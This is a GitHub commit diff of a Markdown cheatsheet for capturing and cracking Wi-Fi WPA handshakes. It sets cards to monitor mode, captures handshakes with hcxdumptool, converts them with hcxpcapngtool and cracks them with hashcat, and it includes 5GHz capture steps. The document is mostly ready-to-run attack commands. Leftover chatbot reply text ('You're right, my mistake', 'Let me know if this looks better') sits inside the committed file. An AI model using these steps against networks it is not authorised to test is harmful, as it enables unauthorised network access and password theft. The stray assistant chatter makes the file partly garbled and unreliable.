Update Wi-Fi_handshake_capture_cheatsheet.md

main
$./Netrunner_& 11 months ago committed by GitHub
parent 12a9eac6df
commit a2bef45db0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -1,17 +1,16 @@
Here is the HTML converted to Markdown for use on GitHub: You're right, my mistake. Here is the Markdown with the titles unboxed and the commands in code blocks:
```markdown
# Wi-Fi Handshake Capture & Crack Cheatsheet 📡 # Wi-Fi Handshake Capture & Crack Cheatsheet 📡
## Table of Contents 📋 ## Table of Contents 📋
- [Preliminary Commands & Information Retrieval](#preliminary) - [Preliminary Commands & Information Retrieval](#preliminary)
- [Capture & Conversion Phase](#capture) - [Capture & Conversion Phase](#capture)
- [Additional Scans & Information](#additional) - [Additional Scans & Information](#additional)
- [Cracking Phase](#cracking) - [Cracking Phase](#cracking)
- [5GHz Network Capturing Cheat Sheet](#5ghz) - [5GHz Network Capturing Cheat Sheet](#5ghz)
## Preliminary Commands & Information Retrieval 🛠 ## Preliminary Commands & Information Retrieval
**Secure Copy from Remote Device** **Secure Copy from Remote Device**
@ -21,7 +20,7 @@ scp -r root@172.16.42.1:/root/example.pcapng /home/username/Desktop
📖 Downloads files from remote devices using SCP. 📖 Downloads files from remote devices using SCP.
**Check Wireless Interfaces** **Check Wireless Interfaces**
``` ```
iwconfig iwconfig
@ -31,25 +30,25 @@ iwconfig
**Kill Interfering Services** **Kill Interfering Services**
``` ```
airmon-ng check kill airmon-ng check kill
``` ```
📖 Stops services that might interfere with wireless tools. 📖 Stops services that might interfere with wireless tools.
## Capture & Conversion Phase 🎯 ## Capture & Conversion Phase
**Set Wireless Card to Monitor Mode** **Set Wireless Card to Monitor Mode**
``` ```
sudo ip link set wlan0 down sudo ip link set wlan0 down
sudo iw wlan0 set monitor control sudo iw wlan0 set monitor control
sudo ip link set wlan0 up sudo ip link set wlan0 up
``` ```
📖 Prepares the wireless card for capture. 📖 Prepares the wireless card for capture.
**Capture Handshakes with hcxdumptool** **Capture Handshakes with hcxdumptool**
``` ```
hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15 hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15
@ -60,22 +59,22 @@ hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15
**Convert Captured File for Hashcat** **Convert Captured File for Hashcat**
``` ```
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
``` ```
📖 Converts packets for password cracking. 📖 Converts packets for password cracking.
## Additional Scans & Information 📡 ## Additional Scans & Information
**Scan for Nearby Networks** **Scan for Nearby Networks**
``` ```
hcxdumptool --do_rcascan -i wlan1 hcxdumptool --do_rcascan -i wlan1
``` ```
📖 Scans and displays nearby networks. 📖 Scans and displays nearby networks.
## Cracking Phase 🔐 ## Cracking Phase
**Crack with Hashcat** **Crack with Hashcat**
@ -85,7 +84,7 @@ hashcat -m 22000 hash.hc22000 wordlist.txt
📖 Uses hashcat to attempt password cracks. 📖 Uses hashcat to attempt password cracks.
## 5GHz Network Capturing Cheat Sheet 📶 ## 5GHz Network Capturing Cheat Sheet
1. **Install Necessary Tools** 1. **Install Necessary Tools**
@ -103,7 +102,7 @@ hashcat -m 22000 hash.hc22000 wordlist.txt
``` ```
sudo ip link set wlan0 down sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up sudo ip link set wlan0 up
``` ```
@ -143,7 +142,7 @@ hashcat -m 22000 hash.hc22000 wordlist.txt
``` ```
sudo ip link set wlan0 down sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor sudo iw dev wlan0 set type monitor
sudo iw dev wlan0 set channel 6 sudo iw dev wlan0 set channel 6
sudo ip link set wlan0 up sudo ip link set wlan0 up
``` ```
@ -154,6 +153,4 @@ hashcat -m 22000 hash.hc22000 wordlist.txt
iwlist wlan0 channel iwlist wlan0 channel
``` ```
``` Let me know if this looks better or if you need any other changes!
Let me know if you need any clarification or have additional requirements for the Markdown format!

Loading…
Cancel
Save